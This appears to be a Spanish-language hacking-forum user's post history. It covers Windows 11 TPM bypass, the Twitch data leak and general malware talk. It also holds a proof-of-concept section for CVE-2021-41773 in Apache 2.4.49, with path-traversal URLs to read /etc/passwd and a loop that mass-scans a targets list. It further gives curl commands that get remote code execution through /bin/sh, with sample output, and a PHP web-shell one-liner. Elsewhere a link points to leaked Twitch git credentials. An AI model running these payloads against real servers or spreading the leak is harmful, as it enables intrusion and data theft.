Mensajes

De todas formas, y a la vista de las últimas respuestas, si se puede omitir TPM y instalar Windows 11, me recomendais instalar Windows 11 en un Acer Aspire 5733Z del año 2013 o menos y un acer aspire 5820TZG del mismo años más o menos?

Por enésima vez. NO

Te puse 11 razones y motivos......

Es un sistema operativo acabo de salir con los fallos que eso comporta y que consumirá más recursos (irá más lento) en un ordenador de hace años no vale la pena.

Tachikomaia ¿estás usando Windows XP o Windows 7?

Porque en Windows 7 no debería salirte ningún error.

En Windows XP puedes descargar manualmente los certificados raíz caducados, explicado aquí:
https://foro.elhacker.net/foro_libre/los_usuarios_de_windows_xp_cada_vez_lo_tienen_mas_dificil-t512191.0.html

[AMD dice que Windows 11 ralentiza hasta un 15% el rendimiento en juegos de sus CPU's]

TPM se puede deshabilitar con un simple clave del registro de Windows:

HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup
AllowUpgradesWithUnsupportedTPMOrCPU
Valor 1

Microsoft muestra en su página de soporte cómo con una simple clave del registro se permite omitir el requisito del TPM en Windows 11

El bypass es muy sencillo xD

Registry Key: HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup
Name: AllowUpgradesWithUnsupportedTPMOrCPU
Type: REG_DWORD
Value: 1

https://support.microsoft.com/en-us/windows/ways-to-install-windows-11-e0edbbfb-cfc5-4011-868b-2ce77ac7c70e


Y por cierto:

AMD dice que Windows 11 ralentiza hasta un 15% el rendimiento en juegos de sus CPU's por un problema con la memoria caché L3 Pero habrá parche.

https://www.amd.com/en/support/kb/faq/pa-400

en principio por abrir un correo no pasa nada, si no has click en ningún enlace

¿Porque utilizas los servicios de un proveedor ruso como Yandex.mail?

WHK, la vulnerabilidad sólo funciona con Apache HTTP 2.4.49, ninguna otra versión anterior.

módulo habilitado mod_cgi  -->  permite además RCE

MCKSys Argentina y funciona también para Windows como comenta Will Dormann en twitter

https://twitter.com/wdormann/status/1445573881121546245

Yo de momento no he visto nada de información privada de usuarios (excepto sus ganancias claro xD)

No veo o no hay datos privados usuarios, ni contraseña cifradas, ni nada personal, teléfonos, direcciones, (excepto dinero, revenue)

Son 6.000 repositorios GIT xD

Una carpeta infosec con unas fotos de una pizarra y poco más  

twitch.tv ha confirmación la filtración de datos:

https://twitter.com/Twitch/status/1445770441176469512

Credenciales GIT:
https://sizeof.cat/post/twitch-leaks/

List of offensive usernames
safety-ml/conductor-offensive-usernames/offensive_usernames/protected_words.txt

vegan
homo
lgbt
gay
queer
lesbian
islam
black
trans
gender
muhammad
kid
mexican
mom
allah
mother
child
women
man
minor
god
dio
jesus
buddha
muslim
girl
boy
white
brown
indian
dad
father
disable
autism
latin
jew
blm
george
floyd
zimmerman
wife
wives
husband
daughter
son
lives
matter
china
chinese
mum
baby
babies
minority
minorities
aids
autistic
kindergarten
africa
america

un malware avanzado como el ransomware puede exfiltrar información incluso con rclone u otra herramienta como Mega xD, no necesita abrir puertos, se comunica con un servidor C2 para enviar cierta información y nada más.

Un malware tipo RAT de acceso remoto (RAT) casero pues si que puede necesitar comunicarse con un puerto, pero no tiene porque estar abierto o a la escucha.

Ocultar no se puede, cifrar los datos si. Por eso en empresas se recomienda instalar un IDS o sistema avanzado similar, para analizar tráfico sospechoso. Por ejemplo gran cantidad de tráfico en poco tiempo y muchas otras cosas.

¿Qué programa has usodo para hacerlo booteable? ¿Rufus?

¿Qué tamaño es el pendrive?

Mejor usa la herramienta de Microsoft, Windows Media Creation Tool:
MediaCreationToolW11.exe
https://go.microsoft.com/fwlink/?linkid=2156295

Disponible en:
https://www.microsoft.com/es-es/software-download/windows11

El tamaño mínimo del pendrive USB tiene que ser 8GB

CVE-2021-41773 POC

La vulnerabilidad sólo funciona con Apache HTTP 2.4.49

Y según Shodan: hay 112,755  Apache Server 2.4.49

127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

Código [Seleccionar] Expandir

<?php echo system($_GET['c']); ?>


Local file disclosure

$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

Remote Code Execution

$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

Bug
https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782

Bien, digo x las dudas ¿no deberían notificar al autor del post?, digo, (sin que se ensanche mi ego), me considero un tipo muy inteligente pero ¿adivino? no lo sabia.-
Lo siento mucho porque comenzaba a confiar mucho en vos tocayo, tengo 70 años y  ya no pienso concurrir a una universidad, me apoyo mucho en los foros y en este hay gente muy amable y comprensiva, no todos claro.-
Hasta siempre a todos.-   

En principio, si tienes las notificaciones activadas recibes un e-mail dónde te indica quién ha movido el tema y dónde lo ha movido.

Sentirse ofendido porque han borrado un mensaje que no incumple las reglas lo entiendo, pero irse del foro porque te han movido un mensaje y nadie te lo ha comunicado, pues me parece un poco exagerado.... 

Entiende que los moderadores y resto del staff intentan tener el foro lo más ordenado posible. Antes (hace años) se había dejado el mensaje de movido para encontrar más fácilmente el mensaje movido, pero al final quedaban bastantes mensajes movidos que al final molestaban